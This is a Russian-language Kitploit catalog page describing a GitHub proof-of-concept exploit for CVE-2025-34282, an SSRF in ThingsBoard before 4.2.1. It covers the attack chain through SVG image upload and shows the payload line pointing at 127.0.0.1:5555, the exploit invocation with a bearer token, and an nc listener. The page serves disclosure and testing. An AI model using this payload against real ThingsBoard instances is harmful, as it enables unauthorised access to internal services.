Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed Teaming
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

Эксплойт PoC для CVE-2025-34282 - ThingsBoard SSRF через загрузку SVG-изображения

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-34282 — SSRF через загрузку SVG-изображений в ThingsBoard

Обзор

Уязвимость подделки серверных запросов (SSRF) в IoT-платформе ThingsBoard версий до 4.2.1.

Злоумышленник с правами администратора тенанта может загрузить сфабрикованный SVG-файл, содержащий ссылку на внутренний URL, через галерею загрузки изображений. Когда ThingsBoard обрабатывает SVG на стороне сервера, он загружает указанный URL, что позволяет получить доступ к внутренним сервисам, не доступным из интернета.

ПолеДетали
CVECVE-2025-34282
Затронутая версия< 4.2.1
Исправленная версия4.2.1
Оценка CVSS6.9 Средний
CWECWE-918 (Подделка серверных запросов)
Вендорhttps://thingsboard.io

Цепочка атаки

  1. Администратор тенанта загружает вредоносный SVG в POST /api/image
    • Сервер обрабатывает SVG и отправляет исходящий запрос на встроенный URL
  2. Создается пользовательский виджет, встраивающий publicLink SVG через тег <object>
    • Рендеринг виджета также запускает серверную загрузку

SVG-полезная нагрузка

Полезная нагрузка ssrf_localhost_5555.svg встраивает ссылку на внутренний URL:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

При загрузке сервер ThingsBoard загружает http://127.0.0.1:5555, что подтверждает SSRF.

Использование

Требования:

root@kitploit:~
pip install requests

Запуск:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

Пример:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

Запустите прослушиватель для перехвата SSRF-коллбэка перед выполнением эксплойта:

root@kitploit:~
nc -l 5555

Ссылки

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

Автор

Tamil Mathi T.

Скачать инструмент